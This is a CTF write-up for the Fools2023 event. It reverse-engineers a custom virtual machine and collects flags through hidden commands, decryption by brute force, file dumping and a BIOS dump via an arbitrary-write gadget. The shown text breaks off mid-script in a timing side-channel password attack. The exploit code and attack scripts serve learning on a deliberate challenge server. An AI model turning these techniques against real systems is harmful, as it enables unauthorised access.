Post outline
Welcome back to yet another one of these! This year’s event is a bit different, as it is not a Pokémon save-file which was tradition at this point, but a bit of a classic CTF event. The event’s website is here, should you wish to attempt this yourself (provided the servers are still up at the time you’re reading this). Without further ado, let’s get down to cracking!
If you want to get spoiled, my rough tools and other small notes can be found in this repo.
Introduction
We are given 3 different telnet-style services, running at ports 13337
, 13338
and 13339
respectively. These are being refered to as GRLTS01, GRLTS02 and GRLINFSRV.
The first outputs of the three services are shown below.
======================================================================
Welcome to Glitch Research Laboratory Network: Test Server 1 (GRLTS01)
======================================================================
GRLTS01 is intended for research purposes only, to aid our engineers
in migrating their software to the latest GLVM architecture.
This server will boot into a machine language monitor, providing
a simple environment for development and testing.
Note that this server is publicly accessible, and thus, should never
be used to store any confidential information. If storage of data is
necessary, consider utilizing encryption, or using our dedicated
storage servers GRLFS01.
Additionally, consider using GRLTS02 for any serious work - it's
an authenticated test server, which should be far more secure.
======================================================================
Running machine language monitor now.
======================================================================
*** BREAK INTO MONITOR AT $F015 ***
R0=$0000 R1=$F021 R2=$F723 R3=$0000
SP=$FEFE [16F000000000000000000000]
Ready.
>
======================================================================
Welcome to Glitch Research Laboratory Network: Test Server 2 (GRLTS02)
======================================================================
This machine requires authentication.
Username:
Welcome to Glitch Research Lab Information Server (GRLINFSRV)
Enter your name for our records (max 15 characters):
Exploring the servers
GRLTS01
The banner on connecting to the server explains a lot about what we’re dealing with. In short, this is a machine running a custom architecture, and our job is to break everything. The language monitor we’re booting into gives us a general purpose register dump - R0 through R3, and the current stack pointer (SP) along with the values currently stored on the stack. Let’s try interacting with the monitor, surely there’s some sort of help command?
> h
Available commands:
r :: print memory as hex
p :: print memory as text
w :: write hex data to memory
x :: execute memory
rf :: load memory from file
ls :: print file index
h :: print this help message
c :: exit monitor and continue
Please enter hex numbers when prompted.
If necessary for debugging, you can break into monitor
with instruction BRK (0x00) and continue with 'c'
Note: memory region E000-FFFF is used by monitor
Ready.
>
Sure enough, there’s a bunch of commands we can use from the monitor. Here, we also learn another important piece
of information about the architecture - there’s a trap instruction (presumably encoded as a single byte - 0x00) that allows us to enter the monitor
when running some code. The result of breaking into the monitor probably looks like what we saw above, that is
the breakpoint address is printed (BREAK INTO MONITOR AT $XXXX
) along with the machine register dump.
Additionally, it seems that the monitor we’re currently interacting with is using the $E000-$FFFF
memory range for it’s
operation.
Flag #0 - Getting your feet wet
One of the commands available from the monitor is ls
. When running it, we get the following output:
> ls
BLK SIZE NAME
=======================
07 01F9 TODO.TXT
08 0560 REPORT03.PRG
0A 02B1 MATHTEST.PRG
Ready.
>
There seems to be some sort of read-only (judging by the lack of a write-file command) file system available on this machine,
and these are the files currently available. How do we read from these, though? There’s a load memory from file
command (rf
), so let’s try running that:
> rf
> Filename? TODO.TXT
> Which address? 1000
Loaded.
Ready.
>
It seems to have done something. There’s a different monitor command (p
) for printing text from memory..
> p
> Which address? 1000
to do list
- revisit the sentience issues in the battle program (missingno addressing players?)
- upgrade slower processor on grlts02
- add glvm disassembler to language monitor <----- URGENT, REQUIRED FOR GLVM TRANSITION
decide on disassembly syntax too
FOOLS2023_{OhLookThereIsATextFile}
PrintStr = 0x0008
StrCmp = 0x0010
FindIndex = 0x0018
ConvertHex = 0x0020
MemCpy = 0x0028
ReadStr = 0x0030
StrTrim = 0x0038
MemSet = 0x0040
2319
2324
2331
far red close blue
Ready.
There’s the first flag! We also get some information about what looks like standard functions available. This will play an important part later.
Flag #1 - This command does not exist
Another very interesting command available is r
. This supposedly allows us to read memory directly from the monitor console.
Let’s try reading something from the monitor’s own memory, which we know from before utilizes the $E000-$FFFF
range.
> r
> Which address? E000
> How many lines? 1
E000 | 31 0A 00 30 0A 00 4F 2E
Ready.
>
It does appear to be working. Using this, we can dump the entire monitor memory and analyze it locally. Being the lazy person I am, I opted to use a shell one-liner to convert from the hex dump representation to a binary file for easier analysis (only requiring removing everything but the hex-dump from the logged server logs, very automated!):
cut -f 3,4,5,6,7,8,9,10 -d " " "input.txt" | sed "s/ //g" | tr -d '\n' | xxd -r -p > dump.rom
One minor gotcha I encountered is that the number of lines is actually expected to be in hexadecimal, and not decimal.
With the monitor memory dumped, we can now take a deeper look into the monitor. Immediately, we can spot the command strings, and one very interesting string in particular:
0000:1860 | 6C 69 6E 65 3A 0A 00 57 6F 77 2C 20 75 6E 64 6F | line:..Wow, undo
0000:1870 | 63 75 6D 65 6E 74 65 64 20 6D 6F 6E 69 74 6F 72 | cumented monitor
0000:1880 | 20 63 6F 6D 6D 61 6E 64 21 20 46 4F 4F 4C 53 32 | command! FOOLS2
0000:1890 | 30 32 33 5F 7B 53 65 63 72 65 74 F0 00 E0 78 F0 | 023_{Secretð.àxð
0000:18A0 | 01 E0 43 6F 6D 6D 61 6E 64 7D 0A 00 41 76 61 69 | .àCommand}..Avai
0000:18B0 | 6C 61 62 6C 65 20 63 6F 6D 6D 61 6E 64 73 3A 0A | lable commands:.
This looks like the next flag! However, it does not work (reasons for which will be revealed later). We now know that this is some sort of hidden command, not present in the command listing. Safely assuming that the monitor would need to do some string comparison on the user input, I searched for an existing command string in the dump, in hopes of finding something interesting. And indeed, there’s a bunch of valid commands listed one after another at a certain offset:
0000:1080 | 68 00 9C E5 F0 A2 72 00 9C EE F0 A2 72 0A 9C EE | h..åð¢r..îð¢r..î
0000:1090 | F0 A2 70 00 9C ED F1 A2 70 0A 9C ED F1 A2 78 00 | ð¢p..íñ¢p..íñ¢x.
0000:10A0 | 9C 09 F2 A2 78 0A 9C 09 F2 A2 63 00 9C 4F F2 A2 | ..ò¢x...ò¢c..Oò¢
0000:10B0 | 63 0A 9C 4F F2 A2 55 43 9C A3 F2 A2 6C 73 9C 62 | c..Oò¢UC.£ò¢ls.b
0000:10C0 | F2 A2 72 66 9C AC F2 A2 77 00 9C 5E F1 A2 77 0A | ò¢rf.¬ò¢w..^ñ¢w.
There’s strings for all of the valid commands listed in the help screen. There’s also a sneaky UC
byte string here, could this be..?
> UC
Wow, undocumented monitor command! FOOLS2023_{Secret4355x0043Command}
Ready.
>
Yes, it is! Interestingly, the monitor seems to be doing some post-processing on the string, which is why the raw string from the dump did not work; we’ll learn the reason behind this soon.
Flag #2 - Very secure encryption™
The “encryption” tool
There’s still more files to explore on the filesystem. The other two filenames hint at them being some sort of executable programs, so let’s try rf
-ing the file
into memory and executing it with x
:
> rf
> Filename? REPORT03.PRG
> Which address? 2000
Loaded.
Ready.
> x
> Which address? 2000
> Really exec at 2000? Type Y if so: Y
GLITCH RESEARCH LABORATORY SELF-CONTAINED ENCRYPTION TOOL
PLEASE ENTER ENCRYPTION PASSWORD:
This time, I ran the executable from $2000
, as the executable will kindly warn you to use this base address when you load it at a different one.
The “encryption tool” asks you for a password, so let’s try entering something:
PLEASE ENTER ENCRYPTION PASSWORD: test
HERE IS THE ENCRYPTED DOCUMENT:
--
n\"6F,9v.{ 0000Jd1)dK@Hg@KFJ\JdHe
!S=P3$$9crQB>́J~,11z&#W1L I+*_,bĐ.ͦZOlʑVz57><1\_HUhO"{GhY6Պ8x5"]F2¢a6Tz<.0[+R*/K0000x;vzI%dk%_+vDOag@30f,험Sg`'~6E+PO
#d
--
Ready.
>
We get a bunch of random looking characters, delimited by two dashes. Presumably, if we enter the right password, the mentioned document will be “decrypted”
and printed on the screen. For obvious reasons, this password does not look like the right one. Typing in random strings is surely not the way to go forward
with this challenge, so I made a dump of the REPORT03.PRG
executable to analyze locally.
If you wish to follow along, you can find the dumped executable here: https://github.com/Muzuwi/fools23/programs/REPORT03.PRG
There’s not much in the executable itself, and looking for interesting strings revealed nothing in particular. It looks like we’re now tasked with reversing the architecture used in this machine, in order to reverse the encryption mechanism used.
Reversing the architecture
We now have the fun task of blind-reversing a completely custom architecture on our hands. Thankfully, the language monitor gives us plenty of tools to
analyze the behavior of the machine. To make the process easier, I made a simple expect
script that automates writing a payload to a constant address and
immediately starts executing it:
#!/usr/bin/env expect
set inputstring [lindex $argv 0];
spawn nc fools2023.online 13337
expect "Ready."
send "w\n"
expect "address?"
send "2000\n"
expect "newline:"
send $inputstring
send ".\n"
# Execute the file
send "x\n"
expect "address?"
send "2000\n"
expect "Really exec"
send "Y\n"
interact
The REPORT03.PRG
executable starts with the following bytes:
0000:0000 | A7 97 2B E2 93 00 93 99 08 00 97 A5 00 20 9C 18 | §.+â.......¥. ..
Under the very safe assumption that this is just a flat executable, let’s start with the first bytes of the file. To figure out the complete architecture, we need to know how each instruction is encoded. By using my little expect script, I iteratively went through the bytes and tried executing them like so:
./execute-at-2000 "XX 00 00 00 00"
Where XX is the opcode currently being investigated. By doing this, we can easily discover the length of each opcode by just spamming BRK instructions right
after the first byte - the BRKs will be consumed as part of the instruction, but the machine will break right at the start of the next instruction.
For example, executing $A7
gives the following:
*** BREAK INTO MONITOR AT $2001 ***
R0=$0059 R1=$0000 R2=$E002 R3=$2000
SP=$FEF8 [022000204CF216F000000000]
This means that $A7
is a single-byte opcode! Same goes for $97
and $2B
. However, for $E2
we get the following result:
*** BREAK INTO MONITOR AT $2003 ***
R0=$0059 R1=$0000 R2=$E002 R3=$2000
SP=$FEFA [04204CF216F0000000000000]
Ah-ha! This instruction is encoded as three bytes, and we’ve reached a different breakpoint. Let’s try executing it with the same bytes as in REPORT03.PRG
,
that is E2 93 00
instead of E2 00 00
:
*** BREAK INTO MONITOR AT $2003 ***
R0=$0059 R1=$0000 R2=$E095 R3=$2000
SP=$FEFA [04204CF216F0000000000000]
Ready.
R2
changed from $E002
to $E095
- that certainly looks like an add r2, imm16
instruction! By repeating the same process for the rest of the
bytes in the file, we can get a feel for the rest of the instructions. I won’t explain the rest of the process here, as it would make the writeup
100x the size. However, discovering the encoding for mov rX, imm16
allowed me to more easily analyze the behavior of the instructions, as I had
complete control over the arguments at that point and could do much more insightful analysis. Additionally, I quickly noticed that a lot of the
encodings had variants for R0
, R1
, R2
, R3
right next to each other, which allowed me to iterate even quicker over the instruction set.
Executing some encodings however only resulted in an ILLEGAL OPCODE
warning and the connection terminating. This was caused by what I assumed was messing
with the stack pointer. This was only partially true, as we’ll see later (shudders 07
opcode).
The password
As I was reversing the architecture, I added each discovered instruction to a little disassembler I wrote. You can find it here: https://github.com/Muzuwi/fools23/src/disassembler.py
Keep in mind, that at this point I struggled a lot with discovering the jump/call/conditional-jmp instructions, and the disassembly at the time of solving was not even close to what you’re about to see. Reversing the architecture was a very incremental process, and each solved challenge gave me even more information on the architecture.
We can now run the disassembler on the encryption executable:
$2000: A7 push pc
$2001: 97 pop r3
$2002: 2B mov r2, r3
$2003: E2 93 00 add r2, $0093
$2006: 93 push r3
$2007: 99 08 00 call $0008 # <PrintStr>
$200A: 97 pop r3
$200B: A5 00 20 cmp r3, $2000
$200E: 9C 18 20 je $2018
$2011: 2B mov r2, r3
$2012: E2 CE 00 add r2, $00CE
$2015: 98 08 00 jmp $0008 # <PrintStr>
$2018: 12 44 21 mov r2, $2144
$201B: 11 12 00 mov r1, $0012
$201E: 10 00 00 mov r0, $0000
$2021: 99 40 00 call $0040 # <MemSet>
$2024: 12 FC 20 mov r2, $20FC
$2027: 99 08 00 call $0008 # <PrintStr>
$202A: 12 44 21 mov r2, $2144
$202D: 13 0F 00 mov r3, $000F
$2030: 99 30 00 call $0030 # <ReadStr>
$2033: 12 44 21 mov r2, $2144
$2036: 99 38 00 call $0038 # <StrTrim>
$2039: 12 44 21 mov r2, $2144
$203C: 10 C0 9F mov r0, $9FC0
$203F: 56 mov r1, [r2]
$2040: AA inc r2
$2041: A3 00 00 cmp r1, $0000
$2044: 0E lsl r0
$2045: D9 xor r0, r1
$2046: 0E lsl r0
$2047: 31 add r0, r1
$2048: 9C 4E 20 je $204E
$204B: 98 3F 20 jmp $203F
$204E: BC 56 21 mov [$2156], r0
$2051: 13 60 21 mov r3, $2160
$2054: 12 60 23 mov r2, $2360
$2057: 11 00 02 mov r1, $0200
$205A: 99 28 00 call $0028 # <MemCpy>
$205D: 12 60 23 mov r2, $2360
$2060: 13 00 01 mov r3, $0100
$2063: 99 86 20 call $2086
$2066: 24 mov r1, r0
$2067: 52 mov r0, [r2]
$2068: D9 xor r0, r1
$2069: 78 mov [r2], r0
$206A: AA inc r2
$206B: AA inc r2
$206C: AF dec r3
$206D: A5 00 00 cmp r3, $0000
$2070: 9D 63 20 jne $2063
$2073: 12 1F 21 mov r2, $211F
$2076: 99 08 00 call $0008 # <PrintStr>
$2079: 12 60 23 mov r2, $2360
$207C: 99 08 00 call $0008 # <PrintStr>
$207F: 12 3F 21 mov r2, $213F
$2082: 99 08 00 call $0008 # <PrintStr>
$2085: 05 ret
$2086: B4 56 21 mov r0, [$2156]
$2089: 01 A7 41 mul r0, $41A7
$208C: CF 55 55 xor r0, $5555
$208F: BC 56 21 mov [$2156], r0
$2092: 05 ret
The standard function addresses hinted at in the first file really help at getting a quick grasp on how the executable works. At the beginning, there’s the
check for the execution address - which makes sense after reverse engineering the architecture, there’s no relative jumps available! We have a bunch of prints,
and then a read string call (which, based on the surrounding instructions, puts the string at $2144
).
Starting at $2039
however, we have a loop that does something with each character of the input password. The result of that operation is then carried
to $204E
in R0
, and written to memory at $2156
. The executable also copies $200
bytes from $2160
to $2360
- this is probably our encrypted document!
Then, for each byte of the encrypted document, a new value of $2156
is calculated by multiplying it by $41A7
and xor’ing with $5555
. The encrypted byte is
then xor’d with this new state of $2156
. Finally, the entire result is printed using PrintStr
.
At this point, I noticed that the encryption is only dependent on the value initially stored in $2156
! The password given by the user is “hashed” by the loop
at $2039
, and then only the hash value is operated upon. A very quick Python reimplementation of the algorithm later..
def advance_m2156(current: int) -> int:
current *= 0x41A7
current ^= 0x5555
return current & 0xFFFF
def low(u16: int) -> int:
return u16 & 0xFF
def high(u16: int) -> int:
return (u16 >> 8) & 0xFF
def decrypt(data: bytes, m2156: int) -> bytes:
arr = bytearray(data)
for i in range(0, len(arr), 2):
m2156 = advance_m2156(m2156)
arr[i] ^= low(m2156)
arr[i + 1] ^= high(m2156)
return arr
def main():
parser = argparse.ArgumentParser()
parser.add_argument("file", help="File to decrypt", type=str)
args = parser.parse_args()
with open(args.file, "rb") as f:
filebytes = f.read()
for i in range(0, 0x10000):
decrypted = decrypt(filebytes, i)
print("Decrypted data:", decrypted)
The input file are the bytes $0160
through $0360
from the REPORT03.PRG
dump.
Using the very advanced technology of Ctrl-F in your favourite editor, we quickly find the decrypted document by searching for the flag prefix (FOOLS2023
):
Decrypted data: bytearray(b"REPORT: MARCH\n\nFight Simulation Program - BLOCKED\nStill debating what the exact premise of the project should be; bimonthly curated box of snacks is currently winning\n\nBuffer overflow on Information Server - PENDING\nStack cookies were implemented, which should mitigate the issue while we work on its resolution\n\nMissingno in Fight Simulation - PENDING\nSkill issues are preventing progression. We are able to reach Super Glitch, but haven\'t figured out the correct movement yet\n\nFOOLS2023_{SuchStrongEncryption}\x00")
Flag #3 - MATHTEST
The final available file is also an executable. Similar to REPORT03.PRG
, this one also requires you to run it from $2000
. However, something seems to be
not working right when you try to actually run the test it’s talking about:
Glitch Research Laboratory Math Coprocessor
Testing Software: Function SQRT
This program will test the SQRT function of the math module.
This function, executable with CALL 0x3009, should compute the
integer part of sqrt(R0) and return it in R0 (preserving R1-R3).
Math module results will be compared with the coprocessor.
Note - if math module is not loaded, this test might crash the machine!
Report any bugs to administrator: ax.arwen@glitchlabsresearch.internal
Continue with running the test (Y/N): Y
*** BREAK INTO MONITOR AT $3009 ***
R0=$0539 R1=$0000 R2=$22AA R3=$0006
SP=$FEF8 [0A3047204CF216F000000000]
Ready.
>
It seems our machine is unfortunately missing the math module, which prevents this test from working. No problem, we’ll just look into the disassembly instead.
$2040: 06 66 swi 66
$2042: 06 64 swi 64
$2044: 99 09 30 call $3009
$2047: 06 65 swi 65
$2049: A2 02 00 cmp r0, $0002
$204C: 9C 56 20 je $2056 # print fail
$204F: A2 01 00 cmp r0, $0001
$2052: 9C 42 20 je $2042 # do everything again?
$2055: 05 ret
This time, I’m skipping the basic PrintStr
/base address check as it is irrelevant to the challenge. The executable contains some very weird two-byte instructions,
which we’ll call swi
for now. Presumably, this is the “math coprocessor” the banner is talking about. At the start, swi 66
is executed once - could this be
some sort of start command for the coprocessor? Afterwards, swi 64
is executed, with a follow-up call to the math module function $3009
.
Whether the test succeeds or not is decided by the execution of the swi 65
instruction. If R0
is equal to 2, the test immediately terminates with a failure
condition. Otherwise, if R0
is equal to 1, the loop is repeated again starting at the swi 64
instruction. Finally, if R0
is neither of these two values,
the function returns and a success state is printed.
Executing the swi 64
instruction causes some random-looking value to be put into R0
. Calling the same instruction again consecutively does not affect
R0
again, until swi 65
is called, after which R0
is cycled into a different value. Additionally, calling swi 66
seems to reset the advances made by
calling swi 65
. At this point, I had an idea - what if we need to simulate what the $3009 function does, i.e modify R0
in some way (which is even hinted
at in the banner text). After that, calling swi 65
causes our custom R0
value to be compared with some internal value of the “coprocessor”, and skips to
the next value in the sequence to be calculated.
With this idea in mind, I came up with the following payload. It iterates over every single R0
value in the sequence and checks the result of the
swi 65
operation. If it’s successful, it continues to the next value in the sequence by calling swi 64
. If it’s wrong, it resets the sequence by calling
swi 66
. This also has to keep track of all the correct values so far, as getting any of them wrong requires going back to the start of the entire sequence.
$2000: 10 00 00 mov r0, $0000
$2003: 11 00 00 mov r1, $0000
$2006: 12 00 00 mov r2, $0000
$2009: 13 50 20 mov r3, $2050
$200C: 06 66 swi 66
$200E: 06 64 swi 64
$2010: 53 mov r0, [r3]
$2011: 06 65 swi 65
$2013: A2 01 00 cmp r0, $0001
$2016: 9C 31 20 je $2031
$2019: A2 02 00 cmp r0, $0002
$201C: 9C 22 20 je $2022
$201F: 98 36 20 jmp $2036 # <None>
$2022: 53 mov r0, [r3]
$2023: A8 inc r0
$2024: 7C mov [r3], r0
$2025: A2 00 00 cmp r0, $0000
$2028: 9C AD DE je $DEAD
$202B: 13 50 20 mov r3, $2050
$202E: 98 0C 20 jmp $200C # <None>
$2031: AB inc r3
$2032: AB inc r3
$2033: 98 0E 20 jmp $200E # <None>
$2036: 12 50 20 mov r2, $2050
$2039: 99 08 00 call $0008 # <PrintStr>
$203C: 00 trap
$203D: 00 trap
And after running the payload:
Test successful! FOOLS2023_{UnknownArchitectureMath}
$*** BREAK INTO MONITOR AT $203C ***
R0=$0000 R1=$0000 R2=$2051 R3=$205E
SP=$FEFA [3D204CF216F0000000000000]
Ready.
Another win!
Flag #4 - A secret file
When listing files in the monitor, there’s a column for a “Block ID”, along with the file size:
> ls
BLK SIZE NAME
=======================
07 01F9 TODO.TXT
08 0560 REPORT03.PRG
0A 02B1 MATHTEST.PRG
Ready.
This made me wonder how file accesses are implemented in the monitor. Using the instruction information gathered so far, I disassembled the monitor itself (the
executable for which starts at $F000
). After digging a bit in the disassembly, I figured out that file I/O is done by utilizing yet anoter swi
instruction,
this time with 04
in the second byte. R1
is expected to be the address to which the file is dumped to, and R0
is the block ID which is to be read.
A simple Python script and one custom payload later, we can dump all files from the machine by executing swi 04
with all possible block IDs.
import foolsocket
def main():
for i in range(0, 0x100):
f = foolsocket.FoolsSocket("fools2023.online", 13337)
f.wait_for_monitor_prompt()
payload = b'\x10' + i.to_bytes(1, 'little') + b'\x00'
payload += b'\x11\x00\xC0\x06\x04\x00\x00\x00\x00\x00\x00'
f.write_bytes(0x1000, payload)
f.execute_at(0x1000)
v = f.wait_for_monitor_prompt(timeout=5.0)
if v is None:
print(f"BLK {format(i, 'X').zfill(2)} does not exist")
continue
with open(f"../dumps/files_{f.port}/blk_{format(i, 'X').zfill(2)}.bin", "wb") as file:
file.write(f.read_bytes(0xC000, 0x1000))
This Python script utilizes the (horribly hacky) FoolsSocket I created to make the discovery process a bit easier and less prone to breaking (how long can you go on with just executing payloads directly from the shell). Running it, we can see that the file listing is actually stored in BLK 00, and the other files are present as well. Unsurprisingly, there’s also a secret file at BLK 09, hidden from the listing!
0000:0000 | 73 64 66 68 6B 64 73 68 20 73 6A 64 66 68 6B 64 | sdfhkdsh sjdfhkd
0000:0010 | 73 66 68 20 74 65 73 74 69 6E 67 20 66 69 6C 65 | sfh testing file
0000:0020 | 20 66 75 6E 63 74 69 6F 6E 73 20 46 4F 4F 4C 53 | functions FOOLS
0000:0030 | 32 30 32 33 5F 7B 54 68 69 73 46 69 6C 65 44 6F | 2023_{ThisFileDo
0000:0040 | 65 73 4E 6F 74 45 78 69 73 74 7D 00 00 00 00 00 | esNotExist}.....
Flag #5 - Dumping the BIOS
All the standard functions like PrintStr
/ReadStr
are actually just calls into the BIOS area, which is located in the lower $1000
bytes of the address space.
However, actually attempting to read anything from the BIOS results in just the value $58
being returned:
0000 | 58 58 58 58 58 58 58 58
0008 | 58 58 58 58 58 58 58 58
0010 | 58 58 58 58 58 58 58 58
There has to be some other way of accessing the BIOS, then. Just as a reminder, we have all the standard functions available:
PrintStr = 0x0008
StrCmp = 0x0010
FindIndex = 0x0018
ConvertHex = 0x0020
MemCpy = 0x0028
ReadStr = 0x0030
StrTrim = 0x0038
MemSet = 0x0040
Maybe one of them is bugged and allows us to pass in an address within the BIOS? That way, we could potentially leak the contents from inside the BIOS itself. However, I attempted to use each one of these but it seems they’re all bailing out early if one of the address arguments is located somewhere within the BIOS.
What else could we potentially do? Considering the fact that we can simply call into any arbitrary address in the BIOS, this feels like a ROP chain would be
a potential solution to this! I started discovery for this by jumping to every single BIOS location and recording the output of the machine afterwards. Thankfully,
the BIOS is for the most part empty, and we only have to focus on the lower part of the $1000
bytes. I discovered this fact by jumping to some later addresses,
and noting that every single address after a certain point just results in a monitor breakpoint, i.e $00
byte.
# !/usr/bin/env python3
import threading
import time
import random
import foolsocket
# Max concurrent connections
max_connections = 5
# Highest address to check
# BIOS is for the most part empty (00)
max_addr = 0x230
def connection_entrypoint(start: int, count: int) -> None:
for target in range(start, start + count):
f = foolsocket.FoolsSocket("fools2023.online", 13337)
f.wait_for_monitor_prompt(5.0)
payload = b'\x10\x00\x00\x11\x00\x00\x12\x00\x00\x13\x00\x00'
payload += b'\x99' + target.to_bytes(2, byteorder='little')
payload += b'\x00'
f.write_bytes(0x1000, payload)
f.execute_at(0x1000)
try:
result = f.wait_for_monitor_prompt(5.0)
if result is None:
print(f"{format(target, 'X').zfill(4)} | ILLEGAL OPCODE")
else:
print(f"{format(target, 'X').zfill(4)} | {result}")
except TimeoutError:
print(f"{format(target, 'X').zfill(4)} | Timed out, infinite loop?")
time.sleep(random.randint(200, 700) / 1000.0)
def main():
threads = []
for i in range(0, max_connections):
count = int(max_addr / max_connections)
start = count * i
if i == max_connections - 1:
count = min(max_addr - max_connections * count, count)
thread = threading.Thread(target=connection_entrypoint, args=(start, count))
threads.append(thread)
for thread in threads:
thread.start()
time.sleep(0.1)
for thread in threads:
thread.join()
You can find the full output in the docs repo here, but for clarity this is what we’re getting as the result:
0004 | ILLEGAL OPCODE
0005 | ILLEGAL OPCODE
0006 | ILLEGAL OPCODE
0007 | ILLEGAL OPCODE
0008 | b'Ready.\n> '
0009 | b'*** BREAK INTO MONITOR AT $000A ***\nR0=$0041 R1=$0009 R2=$E002 R3=$0009\nSP=$FEFA [0B004CF216F0000000000000]\nReady.\n> '
000A | b'*** BREAK INTO MONITOR AT $000A ***\nR0=$0059 R1=$000A R2=$E002 R3=$000A\nSP=$FEFA [0B004CF216F0000000000000]\nReady.\n> '
000B | b'*** BREAK INTO MONITOR AT $000B ***\nR0=$0059 R1=$000B R2=$E002 R3=$000B\nSP=$FEFA [0C004CF216F0000000000000]\nReady.\n> '
To be honest, I think I got pretty lucky with this challenge. However, I noticed that starting at offset $010B
until $0174
for the most part we have a nice
sled into a monitor break instruction:
010B | b'*** BREAK INTO MONITOR AT $0174 ***\nR0=$0000 R1=$0000 R2=$0000 R3=$FF00\nSP=$FEF8 [75010F104CF216F000000000]\nReady.\n> '
...
0173 | b'*** BREAK INTO MONITOR AT $0174 ***\nR0=$0000 R1=$0000 R2=$0000 R3=$0000\nSP=$FEF8 [75010F104CF216F000000000]\nReady.\n> '
0174 | b'*** BREAK INTO MONITOR AT $0174 ***\nR0=$0000 R1=$0000 R2=$0000 R3=$0000\nSP=$FEF8 [75010F104CF216F000000000]\nReady.\n> '
0175 | b'*** BREAK INTO MONITOR AT $0175 ***\nR0=$0000 R1=$0000 R2=$0000 R3=$0000\nSP=$FEF8 [76010F104CF216F000000000]\nReady.\n> '
0176 | b'*** BREAK INTO MONITOR AT $0176 ***\nR0=$0000 R1=$0000 R2=$0000 R3=$0000\nSP=$FEF8 [77010F104CF216F000000000]\nReady.\n> '
Having the register states before and after would be very convenient for analysis of what we’re actually jumping into. Based on the above output alone, we can tell
that there’s a $00
-byte at $0174
. There’s a valid single-byte instruction right before it, so let’s try jumping into it with some carefully prepared arguments.
To hopefully catch any memory accesses, if we set all of our arguments to a valid readable/writable memory address with some sentinel values written there, we
should be able to tell when something interesting happens! This is the payload I came up with:
./execute-at-2000 "13FFFF 100020 110020 120020 130020 997301 00"
The first instruction is a mov r3, $FFFF
, and the others just load the value $2000
into all of the registers. Afterwards, we call into a specific address
in the BIOS. Running this gives us the following register states:
*** BREAK INTO MONITOR AT $0174 ***
R0=$2000 R1=$2000 R2=$2000 R3=$2000
SP=$FEF8 [750112204CF216F000000000]
Whatever we’ve just executed did not affect the registers, what about the memory? If it’s a memory write, then something should have happened to $2000
. Let’s check that:
> r
> Which address? 2000
> How many lines? 1
2000 | 00 20 FF 10 00 20 11 00
Ready.
Oh my!
For those who haven’t noticed it yet, we have just discovered an arbitrary write “gadget”. By messing around with the register values, I discovered that the
instruction at $0173 is actually a mov [r3], r1
! At this point, I had a rough plan on how to dump the BIOS:
- Bootstrap - make the arbitrary write gadget not require user interaction. Replace the trap instruction at
$0174
with a ret($05)
. Conveniently, we can call$0173
with the proper register values and it’ll return to us immediately, because it already replaced the trap instruction with a ret! - Set up read gadget - write our own custom read function to the BIOS using the above gadget. This is as simple as:
$300: 51 mov r0, [r1] $301: 05 ret
$300
was chosen for no particular reason. - Dump the BIOS - use the above arbitrary read function to dump the BIOS.
The final payload is as follows:
$2000: 10 00 00 mov r0, $0000
$2003: 11 05 05 mov r1, $0505
$2006: 12 00 00 mov r2, $0000
$2009: 13 74 01 mov r3, $0174
$200C: 99 73 01 call $0173 # <None>
$200F: 20 mov r0, r0
$2010: 11 51 05 mov r1, $0551
$2013: 13 00 03 mov r3, $0300
$2016: 99 73 01 call $0173 # <None>
$2019: 20 mov r0, r0
$201A: 20 mov r0, r0
$201B: 20 mov r0, r0
$201C: 20 mov r0, r0
$201D: 20 mov r0, r0
$201E: 20 mov r0, r0
$201F: 20 mov r0, r0
$2020: 10 00 00 mov r0, $0000
$2023: 11 00 00 mov r1, $0000
$2026: 12 00 30 mov r2, $3000
$2029: 99 00 03 call $0300 # <None>
$202C: 78 mov [r2], r0
$202D: A9 inc r1
$202E: A9 inc r1
$202F: AA inc r2
$2030: AA inc r2
$2031: A3 00 10 cmp r1, $1000
$2034: 9D 29 20 jne $2029
The BIOS is then dumped to $3000
, and we’re returned to the monitor afterwards. Converting the dump to a binary is trivial and left as an exercise to the reader. If we look at the resulting binary, we can
find the final flag for this server!
0000:0100 | F5 00 21 05 10 FF FF 05 00 00 00 47 6C 69 74 63 | õ.!..ÿÿ....Glitc
0000:0110 | 68 20 52 65 73 65 61 72 63 68 20 4C 61 62 6F 72 | h Research Labor
0000:0120 | 61 74 6F 72 79 20 47 4C 56 4D 20 42 49 4F 53 20 | atory GLVM BIOS
0000:0130 | 76 65 72 73 69 6F 6E 20 31 2E 33 20 2F 20 44 6F | version 1.3 / Do
0000:0140 | 20 6E 6F 74 20 64 69 73 74 72 69 62 75 74 65 21 | not distribute!
0000:0150 | 20 2F 20 46 4F 4F 4C 53 32 30 32 33 5F 7B 44 75 | / FOOLS2023_{Du
0000:0160 | 6D 70 69 6E 67 57 61 73 41 6E 49 6E 73 69 64 65 | mpingWasAnInside
0000:0170 | 4A 6F 62 7D 05 05 00 13 00 00 A4 00 10 9A 40 00 | Job}......¤...@.
GRLTS02
Flag #6 - HACKERMANS
As a reminder, GRLTS02 greets us with the following login prompt:
======================================================================
Welcome to Glitch Research Laboratory Network: Test Server 2 (GRLTS02)
======================================================================
This machine requires authentication.
Username:
Typing admin/root/other generic admin usernames does not work. Have we seen a valid username elsewhere? The answer is yes, in fact! The MATHTEST.PRG executable had an administrator email in it’s banner:
Report any bugs to administrator: ax.arwen@glitchlabsresearch.internal
Let’s try using ax.arwen
as the username then:
======================================================================
Welcome to Glitch Research Laboratory Network: Test Server 2 (GRLTS02)
======================================================================
This machine requires authentication.
Username: ax.arwen
>> Please wait...
>> Username OK. Password required
Alright, now we have a password prompt to get past. Yet again, generic passwords like admin do not work and just return us back to the username login prompt. One very interesting observation is that the password check seems to take a very long time. Additionally, there’s a certain hint given in the text file on GRLTS01:
- upgrade slower processor on grlts02
Immediately, my first idea is that this is a timing sidechannel attack. In short, based on the amount of time taken by the server to respond to our request, we can leak the password, one character at a time. The assumption is:
- If the current character is wrong, the server will bail out immediately
- If the current character is right, the server will start processing the next character
If the next character check takes a disproportionately long amount of time, this increase in response time can be observed and serves as a side-channel attack. Let’s prepare some code to utilize this sidechannel:
#!/usr/bin/env python
import io
import argparse
import statistics
import sys
import itertools
import threading
import time
import pexpect
from typing import *
# How many measurements to average
average_count = 5
# Alphabet to use when iterating over passwords
alphabet = """ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"""
# Max password length
max_pass_length = 23
# Max concurrent connections
max_connections = 5
def measure_time(password: str, p: pexpect.spawn) -> float:
times = []
for i in range(0, average_count):
p.expect("Username: ")
p.sendline("ax.arwen")
